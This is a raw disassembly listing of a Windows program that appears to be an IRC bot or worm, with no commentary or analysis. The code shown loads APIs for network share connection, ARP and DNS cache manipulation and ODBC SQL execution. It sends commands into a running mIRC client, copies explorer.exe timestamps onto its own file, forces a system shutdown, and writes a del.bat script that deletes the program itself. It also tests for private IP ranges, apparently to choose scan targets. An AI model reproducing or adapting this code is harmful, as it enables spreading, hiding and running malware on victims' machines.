push [ebp+var_2C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426370, eax
push offset aDnsflushreso_0 ; "DnsFlushResolverCacheEntry_A"
push [ebp+var_2C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42641C, eax
cmp dword_426370, 0
jz short loc_407CC2
cmp dword_42641C, 0
jnz short loc_407CCC
loc_407CC2: ; CODE XREF: sub_407087+C30�j
mov dword_42651C, 1
loc_407CCC: ; CODE XREF: sub_407087+C39�j
jmp short loc_407CE3
; ---------------------------------------------------------------------------
loc_407CCE: ; CODE XREF: sub_407087+C01�j
call ds:GetLastError
mov dword_426520, eax
mov dword_42651C, 1
loc_407CE3: ; CODE XREF: sub_407087:loc_407CCC�j
push offset aIphlpapi_dll ; "iphlpapi.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_407D3B
push offset aGetipnettable ; "GetIpNetTable"
push [ebp+var_C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42649C, eax
push offset aDeleteipnetent ; "DeleteIpNetEntry"
push [ebp+var_C] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426498, eax
cmp dword_42649C, 0
jz short loc_407D2F
cmp dword_426498, 0
jnz short loc_407D39
loc_407D2F: ; CODE XREF: sub_407087+C9D�j
mov dword_426524, 1
loc_407D39: ; CODE XREF: sub_407087+CA6�j
jmp short loc_407D50
; ---------------------------------------------------------------------------
loc_407D3B: ; CODE XREF: sub_407087+C6E�j
call ds:GetLastError
mov dword_426528, eax
mov dword_426524, 1
loc_407D50: ; CODE XREF: sub_407087:loc_407D39�j
push offset aMpr_dll ; "mpr.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_407DE0
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_14] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264C8, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_14] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264C0, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_14] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426488, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_14] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426388, eax
cmp dword_4264C8, 0
jz short loc_407DD4
cmp dword_4264C0, 0
jz short loc_407DD4
cmp dword_426488, 0
jz short loc_407DD4
cmp dword_426388, 0
jnz short loc_407DDE
loc_407DD4: ; CODE XREF: sub_407087+D30�j
; sub_407087+D39�j ...
mov dword_42652C, 1
loc_407DDE: ; CODE XREF: sub_407087+D4B�j
jmp short loc_407DF5
; ---------------------------------------------------------------------------
loc_407DE0: ; CODE XREF: sub_407087+CDB�j
call ds:GetLastError
mov dword_426530, eax
mov dword_42652C, 1
loc_407DF5: ; CODE XREF: sub_407087:loc_407DDE�j
push offset aShell32_dll ; "shell32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_407E4D
push offset aShellexecutea ; "ShellExecuteA"
push [ebp+var_18] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263B0, eax
push offset aShchangenotify ; "SHChangeNotify"
push [ebp+var_18] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426494, eax
cmp dword_4263B0, 0
jz short loc_407E41
cmp dword_426494, 0
jnz short loc_407E4B
loc_407E41: ; CODE XREF: sub_407087+DAF�j
mov dword_426534, 1
loc_407E4B: ; CODE XREF: sub_407087+DB8�j
jmp short loc_407E62
; ---------------------------------------------------------------------------
loc_407E4D: ; CODE XREF: sub_407087+D80�j
call ds:GetLastError
mov dword_426538, eax
mov dword_426534, 1
loc_407E62: ; CODE XREF: sub_407087:loc_407E4B�j
push offset aOdbc32_dll ; "odbc32.dll"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_407F2E
push offset aSqldriverconne ; "SQLDriverConnect"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_42645C, eax
push offset aSqlsetenvattr ; "SQLSetEnvAttr"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4264A8, eax
push offset aSqlexecdirect ; "SQLExecDirect"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263F0, eax
push offset aSqlallochandle ; "SQLAllocHandle"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263C0, eax
push offset aSqlfreehandle ; "SQLFreeHandle"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_426440, eax
push offset aSqldisconnect ; "SQLDisconnect"
push [ebp+var_28] ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4263C4, eax
cmp dword_42645C, 0
jz short loc_407F22
cmp dword_4264A8, 0
jz short loc_407F22
cmp dword_4263F0, 0
jz short loc_407F22
cmp dword_4263C0, 0
jz short loc_407F22
cmp dword_426440, 0
jz short loc_407F22
cmp dword_4263C4, 0
jnz short loc_407F2C
loc_407F22: ; CODE XREF: sub_407087+E6C�j
; sub_407087+E75�j ...
mov dword_42653C, 1
loc_407F2C: ; CODE XREF: sub_407087+E99�j
jmp short loc_407F43
; ---------------------------------------------------------------------------
loc_407F2E: ; CODE XREF: sub_407087+DED�j
call ds:GetLastError
mov dword_426540, eax
mov dword_42653C, 1
loc_407F43: ; CODE XREF: sub_407087:loc_407F2C�j
push 1
pop eax
leave
retn
sub_407087 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_407F48(char *Src, char *SubStr, char *Source)
sub_407F48 proc near ; CODE XREF: sub_40ABFE+106B�p
; sub_40ABFE+10BB�p ...
Dest = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
cmp [ebp+Src], 0
jz short loc_407F6D
cmp [ebp+SubStr], 0
jz short loc_407F6D
cmp [ebp+Source], 0
jz short loc_407F6D
mov eax, [ebp+SubStr]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_407F74
loc_407F6D: ; CODE XREF: sub_407F48+D�j
; sub_407F48+13�j ...
xor eax, eax
jmp locret_408012
; ---------------------------------------------------------------------------
loc_407F74: ; CODE XREF: sub_407F48+23�j
push [ebp+Src] ; Src
call __strdup
pop ecx
mov [ebp+Dest], eax
cmp [ebp+Dest], 0
jz loc_40800F
push [ebp+SubStr] ; SubStr
push [ebp+Src] ; Str
call _strstr
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_408006
mov eax, [ebp+var_4]
sub eax, [ebp+Src]
push eax ; Count
push [ebp+Src] ; Source
push [ebp+Dest] ; Dest
call _strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
sub eax, [ebp+Src]
mov ecx, [ebp+Dest]
and byte ptr [ecx+eax], 0
push [ebp+Source] ; Str
call _strlen
pop ecx
push eax ; Count
push [ebp+Source] ; Source
push [ebp+Dest] ; Dest
call _strncat
add esp, 0Ch
push [ebp+SubStr] ; Str
call _strlen
pop ecx
mov ecx, [ebp+var_4]
add ecx, eax
push ecx ; Source
push [ebp+Dest] ; Dest
call _strcat
pop ecx
pop ecx
push [ebp+Dest] ; Source
push [ebp+Src] ; Dest
call _strcpy
pop ecx
pop ecx
mov eax, [ebp+Src]
mov [ebp+var_4], eax
loc_408006: ; CODE XREF: sub_407F48+56�j
push [ebp+Dest] ; Memory
call _free
pop ecx
loc_40800F: ; CODE XREF: sub_407F48+3C�j
mov eax, [ebp+var_4]
locret_408012: ; CODE XREF: sub_407F48+27�j
leave
retn
sub_407F48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408014(char *Str, int)
sub_408014 proc near ; CODE XREF: sub_40A9EB+120�p
var_7DC = dword ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
Dst = dword ptr -7D0h
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7DCh
and [ebp+var_7DC], 0
push 7D0h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_7D8], eax
cmp [ebp+var_7D8], 1
jge short loc_40805A
or eax, 0FFFFFFFFh
jmp locret_40816C
; ---------------------------------------------------------------------------
loc_40805A: ; CODE XREF: sub_408014+3C�j
mov eax, [ebp+var_7DC]
mov ecx, [ebp+Str]
mov [ebp+eax*4+Dst], ecx
mov eax, [ebp+var_7DC]
inc eax
mov [ebp+var_7DC], eax
and [ebp+var_7D4], 0
jmp short loc_40808D
; ---------------------------------------------------------------------------
loc_408080: ; CODE XREF: sub_408014:loc_4080C9�j
mov eax, [ebp+var_7D4]
inc eax
mov [ebp+var_7D4], eax
loc_40808D: ; CODE XREF: sub_408014+6A�j
mov eax, [ebp+var_7D4]
cmp eax, [ebp+var_7D8]
jge short loc_4080CB
mov eax, [ebp+Str]
add eax, [ebp+var_7D4]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_4080BD
mov eax, [ebp+Str]
add eax, [ebp+var_7D4]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4080C9
loc_4080BD: ; CODE XREF: sub_408014+96�j
mov eax, [ebp+Str]
add eax, [ebp+var_7D4]
and byte ptr [eax], 0
loc_4080C9: ; CODE XREF: sub_408014+A7�j
jmp short loc_408080
; ---------------------------------------------------------------------------
loc_4080CB: ; CODE XREF: sub_408014+85�j
and [ebp+var_7D4], 0
jmp short loc_4080E1
; ---------------------------------------------------------------------------
loc_4080D4: ; CODE XREF: sub_408014:loc_408147�j
mov eax, [ebp+var_7D4]
inc eax
mov [ebp+var_7D4], eax
loc_4080E1: ; CODE XREF: sub_408014+BE�j
mov eax, [ebp+var_7D4]
cmp eax, [ebp+var_7D8]
jge short loc_408149
mov eax, [ebp+Str]
add eax, [ebp+var_7D4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_408147
mov eax, [ebp+Str]
add eax, [ebp+var_7D4]
movsx eax, byte ptr [eax+1]
test eax, eax
jz short loc_408147
cmp [ebp+var_7DC], 1F4h
jge short loc_408145
mov eax, [ebp+var_7D4]
mov ecx, [ebp+Str]
lea eax, [ecx+eax+1]
mov ecx, [ebp+var_7DC]
mov [ebp+ecx*4+Dst], eax
mov eax, [ebp+var_7DC]
inc eax
mov [ebp+var_7DC], eax
jmp short loc_408147
; ---------------------------------------------------------------------------
loc_408145: ; CODE XREF: sub_408014+106�j
jmp short loc_408149
; ---------------------------------------------------------------------------
loc_408147: ; CODE XREF: sub_408014+E9�j
; sub_408014+FA�j ...
jmp short loc_4080D4
; ---------------------------------------------------------------------------
loc_408149: ; CODE XREF: sub_408014+D9�j
; sub_408014:loc_408145�j
cmp [ebp+arg_4], 0
jz short loc_408166
push 7D0h ; Size
lea eax, [ebp+Dst]
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_408166: ; CODE XREF: sub_408014+139�j
mov eax, [ebp+var_7DC]
locret_40816C: ; CODE XREF: sub_408014+41�j
leave
retn
sub_408014 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40816E proc near ; CODE XREF: sub_408200+39�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
and [ebp+var_4], 0
jmp short loc_408181
; ---------------------------------------------------------------------------
loc_40817A: ; CODE XREF: sub_40816E+28�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_408181: ; CODE XREF: sub_40816E+A�j
cmp [ebp+var_4], 1F4h
jge short loc_408198
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
mov [ecx+eax*4], edx
jmp short loc_40817A
; ---------------------------------------------------------------------------
loc_408198: ; CODE XREF: sub_40816E+1A�j
and [ebp+var_8], 0
jmp short loc_4081A5
; ---------------------------------------------------------------------------
loc_40819E: ; CODE XREF: sub_40816E+5C�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4081A5: ; CODE XREF: sub_40816E+2E�j
mov eax, [ebp+arg_4]
dec eax
cmp [ebp+var_8], eax
jg short loc_4081CC
mov esi, [ebp+arg_4]
sub esi, [ebp+var_8]
dec esi
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
push eax
call sub_4081CF
pop ecx
mov ecx, [ebp+arg_8]
mov [ecx+eax*4], esi
jmp short loc_40819E
; ---------------------------------------------------------------------------
loc_4081CC: ; CODE XREF: sub_40816E+3E�j
pop esi
leave
retn
sub_40816E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4081CF proc near ; CODE XREF: sub_40816E+50�p
; sub_408200+BF�p
var_4 = byte ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
movsx eax, [ebp+arg_0]
push eax ; C
call _tolower ; _tolower
pop ecx
mov [ebp+var_4], al
movsx eax, [ebp+var_4]
cmp eax, 61h
jl short loc_4081FC
movsx eax, [ebp+var_4]
cmp eax, 7Ah
jg short loc_4081FC
movsx eax, [ebp+var_4]
sub eax, 60h
jmp short locret_4081FE
; ---------------------------------------------------------------------------
loc_4081FC: ; CODE XREF: sub_4081CF+19�j
; sub_4081CF+22�j
xor eax, eax
locret_4081FE: ; CODE XREF: sub_4081CF+2B�j
leave
retn
sub_4081CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_408200(char *Str, int)
sub_408200 proc near ; CODE XREF: .text:004092D2�p
; .text:00409391�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call __alloca_probe
push esi
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
push [ebp+arg_4] ; Str
call _strlen
pop ecx
mov [ebp+var_1010], eax
lea eax, [ebp+var_1004]
push eax
push [ebp+var_1010]
push [ebp+arg_4]
call sub_40816E
add esp, 0Ch
mov eax, [ebp+var_1010]
dec eax
mov [ebp+var_100C], eax
mov eax, [ebp+var_100C]
mov [ebp+var_1008], eax
jmp short loc_408276
; ---------------------------------------------------------------------------
loc_40825C: ; CODE XREF: sub_408200:loc_408339�j
mov eax, [ebp+var_1008]
dec eax
mov [ebp+var_1008], eax
mov eax, [ebp+var_100C]
dec eax
mov [ebp+var_100C], eax
loc_408276: ; CODE XREF: sub_408200+5A�j
cmp [ebp+var_100C], 0
jle loc_40833E
loc_408283: ; CODE XREF: sub_408200+134�j
mov eax, [ebp+Str]
add eax, [ebp+var_1008]
movsx eax, byte ptr [eax]
push eax ; C
call _tolower ; _tolower
pop ecx
mov esi, eax
mov eax, [ebp+arg_4]
add eax, [ebp+var_100C]
movsx eax, byte ptr [eax]
push eax ; C
call _tolower ; _tolower
pop ecx
cmp esi, eax
jz loc_408339
mov eax, [ebp+Str]
add eax, [ebp+var_1008]
mov al, [eax]
push eax
call sub_4081CF
pop ecx
mov eax, [ebp+eax*4+var_1004]
mov [ebp+var_1014], eax
mov eax, [ebp+var_1010]
sub eax, [ebp+var_100C]
cmp eax, [ebp+var_1014]
jle short loc_4082FA
mov eax, [ebp+var_1010]
sub eax, [ebp+var_100C]
mov [ebp+var_1018], eax
jmp short loc_408306
; ---------------------------------------------------------------------------
loc_4082FA: ; CODE XREF: sub_408200+E4�j
mov eax, [ebp+var_1014]
mov [ebp+var_1018], eax
loc_408306: ; CODE XREF: sub_408200+F8�j
mov eax, [ebp+var_1008]
add eax, [ebp+var_1018]
mov [ebp+var_1008], eax
mov eax, [ebp+var_1008]
cmp eax, [ebp+var_4]
jl short loc_408327
xor eax, eax
jmp short loc_408347
; ---------------------------------------------------------------------------
loc_408327: ; CODE XREF: sub_408200+121�j
mov eax, [ebp+var_1010]
dec eax
mov [ebp+var_100C], eax
jmp loc_408283
; ---------------------------------------------------------------------------
loc_408339: ; CODE XREF: sub_408200+AD�j
jmp loc_40825C
; ---------------------------------------------------------------------------
loc_40833E: ; CODE XREF: sub_408200+7D�j
mov eax, [ebp+Str]
add eax, [ebp+var_1008]
loc_408347: ; CODE XREF: sub_408200+125�j
pop esi
leave
retn
sub_408200 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40834A proc near ; CODE XREF: sub_40ABFE+342F�p
dwMessageId = dword ptr -108h
Buffer = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
call ds:GetLastError
mov [ebp+dwMessageId], eax
push 0 ; Arguments
push 100h ; nSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 400h ; dwLanguageId
push [ebp+dwMessageId] ; dwMessageId
push 0 ; lpSource
push 1200h ; dwFlags
call ds:FormatMessageA ; FormatMessageA
lea eax, [ebp+Buffer]
mov [ebp+var_4], eax
loc_40838E: ; CODE XREF: sub_40834A+61�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_4083A4
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 9
jnz short loc_4083AD
loc_4083A4: ; CODE XREF: sub_40834A+4D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40838E
; ---------------------------------------------------------------------------
loc_4083AD: ; CODE XREF: sub_40834A+58�j
; sub_40834A+86�j ...
mov eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+Buffer]
cmp eax, ecx
jb short loc_4083DD
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4083AD
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 21h
jl short loc_4083AD
loc_4083DD: ; CODE XREF: sub_40834A+7B�j
push [ebp+dwMessageId]
lea eax, [ebp+Buffer]
push eax
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push offset byte_42654C ; Dest
call __snprintf
add esp, 18h
mov eax, offset byte_42654C
leave
retn
sub_40834A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40840B(char *Format)
sub_40840B proc near ; CODE XREF: sub_40ABFE+34FF�p
Dest = dword ptr -0Ch
hObject = dword ptr -8
var_4 = dword ptr -4
Format = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push 0
push offset aMirc ; "mIRC"
call dword_426430 ; FindWindowA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4084A1
push offset Name ; "mIRC"
push 1000h ; dwMaximumSizeLow
push 0 ; dwMaximumSizeHigh
push 4 ; flProtect
push 0 ; lpFileMappingAttributes
push 0FFFFFFFFh ; hFile
call ds:CreateFileMappingA ; CreateFileMappingA
mov [ebp+hObject], eax
push 0 ; dwNumberOfBytesToMap
push 0 ; dwFileOffsetLow
push 0 ; dwFileOffsetHigh
push 0F001Fh ; dwDesiredAccess
push [ebp+hObject] ; hFileMappingObject
call ds:MapViewOfFile ; MapViewOfFile
mov [ebp+Dest], eax
push [ebp+Format] ; Format
push [ebp+Dest] ; Dest
call _sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call dword_42647C ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call dword_42647C ; SendMessageA
push [ebp+Dest] ; lpBaseAddress
call ds:UnmapViewOfFile ; UnmapViewOfFile
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
push 1
pop eax
jmp short locret_4084A3
; ---------------------------------------------------------------------------
loc_4084A1: ; CODE XREF: sub_40840B+1A�j
xor eax, eax
locret_4084A3: ; CODE XREF: sub_40840B+94�j
leave
retn
sub_40840B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4084A5(LPCSTR lpFileName)
sub_4084A5 proc near ; CODE XREF: WinMain(x,x,x,x)+28A�p
hObject = dword ptr -120h
CreationTime = _FILETIME ptr -11Ch
LastWriteTime = _FILETIME ptr -114h
FileName = byte ptr -10Ch
LastAccessTime = _FILETIME ptr -8
lpFileName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 0
lea eax, [ebp+FileName]
push eax
push 104h
push 0
push offset aExplorer_exe ; "explorer.exe"
push 0
call dword_4264D8 ; SearchPathA
test eax, eax
jnz short loc_4084D4
jmp locret_408580
; ---------------------------------------------------------------------------
loc_4084D4: ; CODE XREF: sub_4084A5+28�j
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short locret_408580
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push [ebp+hObject] ; hFile
call ds:GetFileTime ; GetFileTime
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
push [ebp+lpFileName] ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short locret_408580
lea eax, [ebp+LastWriteTime]
push eax ; lpLastWriteTime
lea eax, [ebp+LastAccessTime]
push eax ; lpLastAccessTime
lea eax, [ebp+CreationTime]
push eax ; lpCreationTime
push [ebp+hObject] ; hFile
call ds:SetFileTime ; SetFileTime
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
locret_408580: ; CODE XREF: sub_4084A5+2A�j
; sub_4084A5+5B�j ...
leave
retn
sub_4084A5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 454h
push 10h
push 0
lea eax, [ebp-454h]
push eax
call _memset
add esp, 0Ch
push 44h
push 0
lea eax, [ebp-444h]
push eax
call _memset
add esp, 0Ch
mov dword ptr [ebp-444h], 44h
mov dword ptr [ebp-418h], 1
and word ptr [ebp-414h], 0
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
push offset aSS_5 ; "%s %s"
push 400h
lea eax, [ebp-400h]
push eax
call __snprintf
add esp, 14h
lea eax, [ebp-454h]
push eax
lea eax, [ebp-444h]
push eax
push 0
push 0
push 28h
push 0
push 0
push 0
lea eax, [ebp-400h]
push eax
push dword ptr [ebp+8]
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jnz short loc_40861E
xor eax, eax
jmp short locret_408624
; ---------------------------------------------------------------------------
loc_40861E: ; CODE XREF: .text:00408618�j
mov eax, [ebp-44Ch]
locret_408624: ; CODE XREF: .text:0040861C�j
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408626 proc near ; CODE XREF: sub_40ABFE+1CFC�p
push ebp
mov ebp, esp
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40F515
pop ecx
pop ecx
push 50005h
push 6
call dword_426390 ; ExitWindowsEx
test eax, eax
jnz short loc_40864C
xor eax, eax
jmp short loc_40864F
; ---------------------------------------------------------------------------
loc_40864C: ; CODE XREF: sub_408626+20�j
push 1
pop eax
loc_40864F: ; CODE XREF: sub_408626+24�j
pop ebp
retn
sub_408626 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408651 proc near ; CODE XREF: sub_4095D3+54D�p
; sub_40ABFE+225E�p
ProcessInformation= _PROCESS_INFORMATION ptr -768h
StartupInfo = _STARTUPINFOA ptr -758h
NumberOfBytesWritten= dword ptr -714h
Buffer = byte ptr -710h
Dest = byte ptr -310h
hObject = dword ptr -20Ch
CommandLine = byte ptr -208h
Filename = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 768h
cmp dword_421C40, 0
jz short loc_408674
cmp dword_4264EC, 0
jnz short loc_408674
push 0 ; Str
call sub_40954C
pop ecx
loc_408674: ; CODE XREF: sub_408651+10�j
; sub_408651+19�j
call sub_41050C
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 400h ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
lea eax, [ebp+Buffer]
push eax
push offset aSdel_bat ; "%sdel.bat"
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+Dest]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0
jbe locret_408818
lea eax, [ebp+Dest]
push eax
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push eax ; Str
call _strlen
pop ecx
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call ds:WriteFile ; WriteFile
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
push 10h ; Size
push 0 ; Val
lea eax, [ebp+ProcessInformation]
push eax ; Dst
call _memset
add esp, 0Ch
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+StartupInfo.lpTitle], offset dword_426750
mov [ebp+StartupInfo.cb], 44h
mov [ebp+StartupInfo.dwFlags], 1
and [ebp+StartupInfo.wShowWindow], 0
push 104h ; nSize
lea eax, [ebp+Filename]
push eax ; lpFilename
push 0 ; lpModuleName
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+Filename]
push eax ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4087B1
push 80h ; dwFileAttributes
lea eax, [ebp+Filename]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
loc_4087B1: ; CODE XREF: sub_408651+14C�j
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dest]
push eax
push offset aComspecCSS ; "%%comspec%% /c %s %s"
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 10h
push 104h ; nSize
lea eax, [ebp+CommandLine]
push eax ; lpDst
lea eax, [ebp+Buffer]
push eax ; lpSrc
call ds:ExpandEnvironmentStringsA ; ExpandEnvironmentStringsA
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 4008h ; dwCreationFlags
push 1 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
push 0 ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
locret_408818: ; CODE XREF: sub_408651+7E�j
leave
retn
sub_408651 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 2Ch
cmp dword ptr [ebp+8], 0
jz loc_4088CC
push offset dword_426768
push dword ptr [ebp+8]
call _strcmp
pop ecx
pop ecx
test eax, eax
jz loc_4088CC
push 20h
push dword ptr [ebp+8]
lea eax, [ebp-24h]
push eax
call _strncpy
add esp, 0Ch
push offset a_ ; "."
lea eax, [ebp-24h]
push eax
call _strtok
pop ecx
pop ecx
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz short loc_4088CC
push dword ptr [ebp-4]
call _atoi
pop ecx
mov [ebp-28h], eax
push offset a__0 ; "."
push 0
call _strtok
pop ecx
pop ecx
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz short loc_4088CC
push dword ptr [ebp-4]
call _atoi
pop ecx
mov [ebp-2Ch], eax
cmp dword ptr [ebp-28h], 0Ah
jz short loc_4088C7
cmp dword ptr [ebp-28h], 0ACh
jnz short loc_4088B5
cmp dword ptr [ebp-2Ch], 0Fh
jle short loc_4088B5
cmp dword ptr [ebp-2Ch], 20h
jl short loc_4088C7
loc_4088B5: ; CODE XREF: .text:004088A7�j
; .text:004088AD�j
cmp dword ptr [ebp-28h], 0C0h
jnz short loc_4088CC
cmp dword ptr [ebp-2Ch], 0A8h
jnz short loc_4088CC
